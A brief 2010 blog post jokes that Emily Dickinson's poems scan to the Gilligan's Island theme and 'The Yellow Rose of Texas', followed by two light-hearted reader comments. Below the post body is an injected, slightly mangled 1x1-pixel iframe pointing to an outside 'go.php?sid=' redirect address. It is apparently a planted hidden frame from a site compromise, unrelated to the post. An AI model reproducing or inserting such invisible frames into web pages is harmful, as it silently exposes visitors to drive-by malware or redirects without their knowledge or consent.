Posted by: wrmcnutt | October 18, 2010

Emily Dickenson


Did you know that you can sing most of Emily’s poems to either the Ballad of Gilligan’s Island or the Yellow Rose of Texas.  Here’s the scancion, resepectively:

I saw a funeral in my brain and mourners to and fro

here’s a yellow rose in Texas that I am going to see,

 

Because I could not stop for death he kindly stopped for me

Just sit right back and you’ll hear a tale,

Try it. It’s fun.  Well, as long as you’re not a big Dickenson fan.  At least one my friends has never forgiven me for pointing this out to her.

[iframe width=”1″ height=”1″ src=”http://s6g.info/go.php?sid=1″%5D

Responses

  1. heheheheheeeeeee.

    you are pure evil, do you know that?
    by the way, when are we gonna get to read chapter five?????

  2. Also House of the Rising Sun and I’d Like to Teach the World to Sing (aka I’d Like to Buy the World a Coke).


Leave a Reply

Categories

